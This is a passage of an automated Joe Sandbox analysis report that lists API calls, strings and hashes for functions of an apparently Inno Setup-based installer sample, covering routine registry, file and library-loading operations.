                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                                      • String ID: LoadTypeLib$RegisterTypeLib
                                                                                                      • API String ID: 1312246647-2435364021
                                                                                                      • Opcode ID: 384f0062f956a7e6e5f729262f076ec348bfef461e3db0757be0fdeeca084a77
                                                                                                      • Instruction ID: 5567ca09ff2ddd9e87874ef4cfa4ab968baaa8f1c3db1669d027a8a21fc87fa6
                                                                                                      • Opcode Fuzzy Hash: 384f0062f956a7e6e5f729262f076ec348bfef461e3db0757be0fdeeca084a77
                                                                                                      • Instruction Fuzzy Hash: 20119331B00604AFDB11EFA6CD55A5EB7BDEB8A705B51C4B6BC04E3652DA389E04CB24
                                                                                                      Function 00456F8C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456FA6
                                                                                                      • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00457043
                                                                                                      Strings
                                                                                                      • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FD2
                                                                                                      • Failed to create DebugClientWnd, xrefs: 0045700C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                                      • API String ID: 3850602802-3720027226
                                                                                                      • Opcode ID: e461573c832d53d536b60bdd09be1689879239ada0565844d92a82a55e03096e
                                                                                                      • Instruction ID: 61f5065308a022425a12d25e559eb7300ab1b4b0d104b50eccf394a1c4e119f6
                                                                                                      • Opcode Fuzzy Hash: e461573c832d53d536b60bdd09be1689879239ada0565844d92a82a55e03096e
                                                                                                      • Instruction Fuzzy Hash: 921123706082509BD300AB689C82B5F7BD89B55719F45403BF9859B3C3D7798C08C7AE
                                                                                                      Function 00495D70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59processCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000,00495E13), ref: 00495DDE
                                                                                                      • CloseHandle.KERNEL32(x^I,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000), ref: 00495DF5
                                                                                                        • Part of subcall function 00495CC8: GetLastError.KERNEL32(00000000,00495D60,?,?,?,?), ref: 00495CEC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateErrorHandleLastProcess
                                                                                                      • String ID: D$x^I
                                                                                                      • API String ID: 3798668922-903578107
                                                                                                      • Opcode ID: 39c0d8672a1bce61a407111d09c5e91ba0fa0ceca0774959188b9b62fea67dd3
                                                                                                      • Instruction ID: 0d7d1bccb2b79611993d32b5dcf50d38d0c3e5c5098d5d0063742a7482510134
                                                                                                      • Opcode Fuzzy Hash: 39c0d8672a1bce61a407111d09c5e91ba0fa0ceca0774959188b9b62fea67dd3
                                                                                                      • Instruction Fuzzy Hash: F201A1B1604648AFDF01EBA2DC42E9FBBACDF08704F60003AF904E72C1D6385E008A28
                                                                                                      Function 00478608 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowkeyboardCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                      • GetFocus.USER32 ref: 00478673
                                                                                                      • GetKeyState.USER32(0000007A), ref: 00478685
                                                                                                      • WaitMessage.USER32(?,00000000,004786AC,?,00000000,004786D3,?,?,00000001,00000000,?,?,?,0047FED4,00000000,00480D8E), ref: 0047868F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FocusMessageStateTextWaitWindow
                                                                                                      • String ID: Wnd=$%x
                                                                                                      • API String ID: 1381870634-2927251529
                                                                                                      • Opcode ID: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                                                                      • Instruction ID: ef44951ba698f020dd2967180cd2d6f5e0b89f016f08406409eb47c9a327eab3
                                                                                                      • Opcode Fuzzy Hash: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                                                                      • Instruction Fuzzy Hash: 2411A374644244BFC700EF65DD45A9E7BF8EB49714B5184BAF408E3691DB38AE00CA6E
                                                                                                      Function 0046E8B8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E8C0
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E8CF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$File$LocalSystem
                                                                                                      • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                                      • API String ID: 1748579591-1013271723
                                                                                                      • Opcode ID: 2e2682d59cfc45f7ed460395edcc4d500eda373c92ad7cb826f7e8648d0918d2
                                                                                                      • Instruction ID: 5dd70de3b3cbc2db986134396dd9c806d54cb2705fd1511918c86a199fc004ed
                                                                                                      • Opcode Fuzzy Hash: 2e2682d59cfc45f7ed460395edcc4d500eda373c92ad7cb826f7e8648d0918d2
                                                                                                      • Instruction Fuzzy Hash: 1711F8A440C3919AD340DF2AC44432BBBE4AF89704F44892EF9D8D6381E779C948DB77
                                                                                                      Function 00453F62 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F6F
                                                                                                        • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 00453F94
                                                                                                        • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AttributesDeleteErrorLastMove
                                                                                                      • String ID: DeleteFile$MoveFile
                                                                                                      • API String ID: 3024442154-139070271
                                                                                                      • Opcode ID: 987ea279d6d59187c3e0b7c28975cb0d289204635ad797c92353d6d323b91857
                                                                                                      • Instruction ID: b42c41819cc20c1867e4fcb1ab4fb5766129ddbc0fc5112b2d6697d8e42203d6
                                                                                                      • Opcode Fuzzy Hash: 987ea279d6d59187c3e0b7c28975cb0d289204635ad797c92353d6d323b91857
                                                                                                      • Instruction Fuzzy Hash: 49F062716041455AEB01FAA5D84266EA3ECDB8430BFA0403BB800BB6C3DA3C9E09493D
                                                                                                      Function 00483644 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483685
                                                                                                      • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004836A8
                                                                                                      Strings
                                                                                                      • CSDVersion, xrefs: 0048367C
                                                                                                      • System\CurrentControlSet\Control\Windows, xrefs: 00483652
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                      • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                                      • API String ID: 3677997916-1910633163
                                                                                                      • Opcode ID: 753ec1cdaceecf10a2c10abed9fa14ba9196f183527e9def43a7b07e5ea74203
                                                                                                      • Instruction ID: 3c550b8be62ae6962ae8a8b2bb2136c6a1766c1456238aff6c9f059f5d92f743
                                                                                                      • Opcode Fuzzy Hash: 753ec1cdaceecf10a2c10abed9fa14ba9196f183527e9def43a7b07e5ea74203
                                                                                                      • Instruction Fuzzy Hash: B1F06D75E00208B6DF20EED88C45BAFB3BCAF14B05F204566E910E7381F6789B448B59
                                                                                                      Function 004596C8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                                      • API String ID: 47109696-2631785700
                                                                                                      • Opcode ID: 2bb6d2a90fde3dca571cbffa0de55d15307f7e9fe95e0bdc468a8876b40318f9
                                                                                                      • Instruction ID: 5fc53f2980ca067f7fdefaa7aa50a153e5e830959166a8c5adde0da5508e813c
                                                                                                      • Opcode Fuzzy Hash: 2bb6d2a90fde3dca571cbffa0de55d15307f7e9fe95e0bdc468a8876b40318f9
                                                                                                      • Instruction Fuzzy Hash: 97F0AF35720150DBCB10EF5AE885B4E6298DB99396F50403BB985CB263C77CCC06CA99
                                                                                                      Function 0042D900 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B46,00000000,00453BE9,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FD9,00000000), ref: 0042D91A
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D920
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                                      • API String ID: 1646373207-4063490227
                                                                                                      • Opcode ID: 9f11ee2d5e3000e0cdd038ccf0fc88bc65f7f941c6d0e4eb05ced4219cc1a029
                                                                                                      • Instruction ID: 1097081faf8e12b72459453f22f39748745641366cc83a46a0cb0e3cd7246884
                                                                                                      • Opcode Fuzzy Hash: 9f11ee2d5e3000e0cdd038ccf0fc88bc65f7f941c6d0e4eb05ced4219cc1a029
                                                                                                      • Instruction Fuzzy Hash: 5FE04FE1B40B1112D71066BA5C82B6B158E4B84724F90443B3994E62C3DDBCD9885A5D
                                                                                                      Function 0042EB64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAE0), ref: 0042EB72
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB78
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                                      • API String ID: 1646373207-260599015
                                                                                                      • Opcode ID: ea69c1903bbb3952bc51afe47cebbdaeff40ebefb6d83304b24a691856bce627
                                                                                                      • Instruction ID: 186c8a8b24504359f9bd95d8817b94a00a7cf61d77d8ea7090d5fad6c77db3b3
                                                                                                      • Opcode Fuzzy Hash: ea69c1903bbb3952bc51afe47cebbdaeff40ebefb6d83304b24a691856bce627
                                                                                                      • Instruction Fuzzy Hash: 1CD0C792312732666D10F1F73CD1DBB098C89116753544477F505E5241D55DDD01196D
                                                                                                      Function 0044F754 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: NotifyWinEvent$user32.dll
                                                                                                      • API String ID: 1646373207-597752486
                                                                                                      • Opcode ID: ae93fc19694d9525260dce27dd3aecea032003b0c05c01207aef2e00a83e3bcb
                                                                                                      • Instruction ID: adaf68bc035e952e092e397114f6a1653fed54d9058db7208dfb757fc5d15743
                                                                                                      • Opcode Fuzzy Hash: ae93fc19694d9525260dce27dd3aecea032003b0c05c01207aef2e00a83e3bcb
                                                                                                      • Instruction Fuzzy Hash: F7E012F4E417049DEF00BBF5BA86B1E3A90E764718B01417FF404A62A2DB7C440C8E5D
                                                                                                      Function 00498338 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                                      • API String ID: 1646373207-834958232
                                                                                                      • Opcode ID: a3044ebe087eacdbfcba4854d25501df4a36c2cbac561551b3a8e0a3d6241fb5
                                                                                                      • Instruction ID: 7eda4cb16e2cba450c320cc229382d7be1fc12bfd2fbc27455de3eb8489cf644
                                                                                                      • Opcode Fuzzy Hash: a3044ebe087eacdbfcba4854d25501df4a36c2cbac561551b3a8e0a3d6241fb5
                                                                                                      • Instruction Fuzzy Hash: 88B092C128174298AC7032FA0C02A1F08084882F28718083F3C48F50C2CD6ED804182D
                                                                                                      Function 00464960 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0044B668: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
                                                                                                        • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
                                                                                                        • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
                                                                                                        • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
                                                                                                        • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
                                                                                                        • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
                                                                                                        • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
                                                                                                        • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
                                                                                                        • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
                                                                                                        • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
                                                                                                        • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
                                                                                                        • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
                                                                                                        • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
                                                                                                        • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
                                                                                                        • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
                                                                                                        • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
                                                                                                        • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
                                                                                                        • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
                                                                                                      • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
                                                                                                      • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                      • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                      • API String ID: 2238633743-2683653824
                                                                                                      • Opcode ID: b0b0cc609965775dafbc177cfbf53c5f286fe0b9a785a06f0526f65a81a5d1e8
                                                                                                      • Instruction ID: ef62b78e1ecbbf86accf82cc5e54c74759ffbda80f6f2c7107c350d82a6c33f4
                                                                                                      • Opcode Fuzzy Hash: b0b0cc609965775dafbc177cfbf53c5f286fe0b9a785a06f0526f65a81a5d1e8
                                                                                                      • Instruction Fuzzy Hash: 48B092E06E2700A88E00B7FA2887B0B104895D0B1DB56063F704979092EB7C4008CD6E
                                                                                                      Function 0047D334 Relevance: 6.2, APIs: 4, Instructions: 195fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E), ref: 0047D484
                                                                                                      • FindClose.KERNEL32(000000FF,0047D4AF,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E,00000000), ref: 0047D4A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
